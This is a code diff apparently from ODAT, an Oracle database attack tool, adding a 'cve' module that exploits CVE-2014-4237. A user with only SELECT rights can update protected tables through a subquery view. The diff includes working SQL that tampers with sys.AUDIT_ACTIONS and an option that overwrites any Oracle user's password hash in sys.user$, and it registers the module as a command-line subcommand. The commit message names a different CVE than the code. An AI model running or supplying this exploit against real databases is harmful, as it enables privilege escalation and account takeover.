New module ('cve') for exploiting CVE. CVE-2012-3137 only today.

CVE_XXXX_YYYY.py

@@ -0,0 +1,107 @@
+import logging
+from OracleDatabase import OracleDatabase
+from Constants import *
+from Utils import checkOptionsGivenByTheUser
+from passlib.hash import oracle11 as oracle11
+from passlib.hash import oracle10 as oracle10
+
+
+class CVE_XXXX_YYYY (OracleDatabase):
+	'''
+	CVE-2014-4237 ? : A user authenticated can modify all tables who can select even if he can't modify them normally (no ALTER privilege)
+	'''
+
+
+	def __init__(self, args):
+		'''
+		Constructor
+		'''
+		logging.debug("CVE_XXXX_YYYY object created")
+		OracleDatabase.__init__(self,args)
+		self.args=args
+
+	####################################################################################################################
+	#											CVE_2014_4237
+	#
+	# A user authenticated can modify all tables who can select even if he can't modify them 
+	# normally (no ALTER privilege on them)
+	# https://twitter.com/gokhanatil/status/595853921479991297
+	####################################################################################################################
+	def exploit_CVE_2014_4237 (self, updateRequestNormal, updateRequestWithView):
+		'''
+		Returns:
+		- True: current user can exploit this CVE
+		- False: current user can not exploit this CVE
+		- None: impossible to known if vulnerable
+		'''
+		logging.info("Try to exploit the CVE-2014-4237 for doing this operation: {0}".format(updateRequestNormal))
+		status = self.__execPLSQL__(updateRequestNormal)
+		if isinstance(status, Exception):
+			logging.info("The current user can NOT modify the table with a simple update request. It is a good news for testing if vulnerable!")
+			logging.info('Testing if CVE-2014-4237 can be exploited by current user using the following SQL request: {0}'.format(updateRequestWithView))
+			status = self.__execPLSQL__(updateRequestWithView)
+			if isinstance(status, Exception):
+				logging.info("Impossible to modify the table (not vulnerable to CVE-2014-4237): {0}".format(self.cleanError(status)))
+				return False
+			else : 
+				logging.info("The current user can alter the table. Vulnerable to CVE-2014-4237.")
+				return True
+		else :
+			logging.info("The current user can modify the table with a simple update request. Bad news for testing if vulnerable!")
+			return None
+
+	####################################################################################################################
+	#											ALL FUNCTION
+	####################################################################################################################
+
+	def testAll (self):
+		'''
+		Test all CVE
+		'''
+		REQ_ALTER_AUDIT_ACTIONS_WITH_VIEW_FOR_CVE_2014_4237 = "update (with tmp as (select * from sys.AUDIT_ACTIONS) select * from tmp) set name='UNKNOWN' where action=0"
+		REQ_ALTER_AUDIT_ACTIONS_FOR_CVE_2014_4237 = "update sys.AUDIT_ACTIONS set name='UNKNOWN' where action=0"
+		self.args['print'].subtitle("Modify any table while/when he can select it only normally (CVE-2014-4237)?")
+		status = self.exploit_CVE_2014_4237(updateRequestNormal=REQ_ALTER_AUDIT_ACTIONS_FOR_CVE_2014_4237, updateRequestWithView=REQ_ALTER_AUDIT_ACTIONS_WITH_VIEW_FOR_CVE_2014_4237)
+		if status == True:
+			logging.info("The current user can modify the table sys.AUDIT_ACTIONS for example while he can't modify it normally (no alter privilege)")
+			self.args['print'].goodNews("OK")
+		elif status == False:
+			logging.info("The current user can't exploit this CVE")
+			self.args['print'].badNews("KO")
+		else:
+			logging.info("Impossible to know if this database is vulnerable to this CVE because current user is too privileged")
+			self.args['print'].unknownNews("Impossible to know")
+
+
+
+def runCVEXXXYYYModule(args):
+	'''
+	Run the CVE_XXXX_YYYY module
+	'''
+	if checkOptionsGivenByTheUser(args,["test-module","set-pwd-2014-4237"],checkAccount=False) == False : return EXIT_MISS_ARGUMENT
+	cve = CVE_XXXX_YYYY(args)
+	status = cve.connection(stopIfError=True)
+	if args['test-module'] == True :
+		cve.testAll()
+	if args['set-pwd-2014-4237'] != None :
+		hash11g = oracle11.encrypt(args['set-pwd-2014-4237'][1])
+		hash10g = oracle10.encrypt(args['set-pwd-2014-4237'][1], user=args['set-pwd-2014-4237'][0])
+		logging.info("hash11g('{2}')={0} & hash10g('{2}')={1}".format(hash11g, hash10g, args['set-pwd-2014-4237'][0]))
+		REQ_ALTER_AUDIT_ACTIONS_WITH_VIEW_FOR_CVE_2014_4237 = "update (with tmp as (select * from sys.user$) select * from tmp) set password='{1}', SPARE4='{2}' where name='{0}'".format(args['set-pwd-2014-4237'][0], hash10g, hash11g)
+		REQ_ALTER_AUDIT_ACTIONS_FOR_CVE_2014_4237 = "update sys.user$ set password='{1}', SPARE4='{2}' where name='{0}'".format(args['set-pwd-2014-4237'][0], hash10g, hash11g)
+		args['print'].title("Modify password of '{0}' by these hashs '{1}' & '{2}' using CVE-2014-4237".format(args['set-pwd-2014-4237'][0],hash10g, hash11g))
+		status = cve.exploit_CVE_2014_4237(updateRequestNormal=REQ_ALTER_AUDIT_ACTIONS_FOR_CVE_2014_4237, updateRequestWithView=REQ_ALTER_AUDIT_ACTIONS_WITH_VIEW_FOR_CVE_2014_4237)
+		if status == True:
+			cve.args['print'].goodNews("The password of '{0}' has been replaced by '{1}' by exploiting CVE-2014-4237. DB restart necessary!".format(args['set-pwd-2014-4237'][0],args['set-pwd-2014-4237'][1]))
+		elif status == False:
+			cve.args['print'].badNews("The password of '{0}' has NOT been replaced".format(args['set-pwd-2014-4237'][0]))
+		elif status == None:
+			cve.args['print'].goodNews("The password of '{0}' has been replaced. This CVE has not be used to do that (if it impacts this database). DB restart necessary!".format(args['set-pwd-2014-4237'][0]))
+
+
+
+
+
+
+
+

odat.py

@@ -43,6 +43,7 @@
 from Search import runSearchModule
 from Unwrapper import runUnwrapperModule
 from PrivilegeEscalation import PrivilegeEscalation, runPrivilegeEscalationModule
+from CVE_XXXX_YYYY import CVE_XXXX_YYYY, runCVEXXXYYYModule
 
 def runClean (args):
 	'''
@@ -170,7 +171,10 @@ def runAllModules(args):
 			#Pribvilege escalation
 			privilegeEscalation = PrivilegeEscalation(args)
 			privilegeEscalation.testAll()
-			privilegeEscalation.close() #Close the socket to the remote database
+			#Test some CVE
+			cve = CVE_XXXX_YYYY(args)
+			cve.testAll()
+			cve.close() #Close the socket to the remote database
 			#CVE_2012_3137
 			cve = CVE_2012_3137 (args)
 			cve.testAll()
@@ -380,7 +384,12 @@ def main():
 	PPprivilegeEscalation2.add_argument('--exec-with-create-any-trigger',dest='exec-with-create-any-trigger',nargs=1,metavar=('request'),help='execute this request as SYS with CREATE ANY TRIGGER method')
 	PPprivilegeEscalation2.add_argument('--exec-with-analyze-any',dest='exec-with-analyze-any',nargs=1,metavar=('request'),help='execute this request as SYS with ANALYZE ANY method')
 	PPprivilegeEscalation2.add_argument('--exec-with-create-any-index',dest='exec-with-create-any-index',nargs=1,metavar=('request'),help='execute this request as SYS with CREATE ANY INDEX method')
-	#1.20- Parent parser: search
+	#1.20- Parent parser: CVE_XXXX_YYYY
+	PPcve = argparse.ArgumentParser(add_help=False,formatter_class=lambda prog: argparse.HelpFormatter(prog, max_help_position=MAX_HELP_POSITION))
+	PPcve._optionals.title = "cve commands"
+	PPcve.add_argument('--test-module',dest='test-module',action='store_true',help='test the module before use it')
+	PPcve.add_argument('--set-pwd-2014-4237',dest='set-pwd-2014-4237',nargs=2,metavar=('username','password'),help="modify a Oracle user's password unsing CVE-2014-4237")
+	#1.21- Parent parser: search
 	PPsearch = argparse.ArgumentParser(add_help=False,formatter_class=lambda prog: argparse.HelpFormatter(prog, max_help_position=MAX_HELP_POSITION))
 	PPsearch._optionals.title = "search commands"
 	PPsearch.add_argument('--column-names',dest='column-names',default=None,required=False,metavar='sqlPattern',help='search pattern in all collumns')
@@ -393,7 +402,7 @@ def main():
 	PPunwrapper.add_argument('--object-name',dest='object-name',default=None,required=False,help='unwrap this object stored in the database')
 	PPunwrapper.add_argument('--file',dest='file',default=None,required=False,help='unwrap the source code stored in a file')
 	PPunwrapper.add_argument('--test-module',dest='test-module',action='store_true',help='test the module before use it')
-	#1.22- Parent parser: clean
+	#1.23- Parent parser: clean
 	PPclean = argparse.ArgumentParser(add_help=False,formatter_class=lambda prog: argparse.HelpFormatter(prog, max_help_position=MAX_HELP_POSITION))
 	PPclean._optionals.title = "clean commands"
 	PPclean.add_argument('--all',dest='all',action='store_true',required=True,help='clean all traces and logs stored locally')
@@ -462,13 +471,16 @@ def main():
 	#2.q- privilegeEscalation
 	parser_privilegeEscalation = subparsers.add_parser('privesc',parents=[PPoptional,PPconnection,PPprivilegeEscalation0, PPprivilegeEscalation,PPprivilegeEscalation2,PPoutput],help='to gain elevated access')
 	parser_privilegeEscalation.set_defaults(func=runPrivilegeEscalationModule,auditType='privesc')
-	#2.r- search
+	#2.r- cve
+	parser_cve = subparsers.add_parser('cve',parents=[PPoptional,PPconnection,PPcve,PPoutput],help='to exploit a CVE')
+	parser_cve.set_defaults(func=runCVEXXXYYYModule,auditType='cve')
+	#2.s- search
 	parser_search = subparsers.add_parser('search',parents=[PPoptional,PPconnection,PPsearch,PPoutput],help='to search in databases, tables and columns')
 	parser_search.set_defaults(func=runSearchModule,auditType='search')
-	#2.s- PPunwrapper
+	#2.t- PPunwrapper
 	parser_unwrapper = subparsers.add_parser('unwrapper',parents=[PPoptional,PPconnection,PPunwrapper,PPoutput],help='to unwrap PL/SQL source code (no for 9i version)')
 	parser_unwrapper.set_defaults(func=runUnwrapperModule,auditType='unwrapper')
-	#2.t- clean
+	#2.u- clean
 	parser_clean = subparsers.add_parser('clean',parents=[PPoptional,PPclean,PPoutput],help='clean traces and logs')
 	parser_clean.set_defaults(func=runClean,auditType='clean')
 	#3- parse the args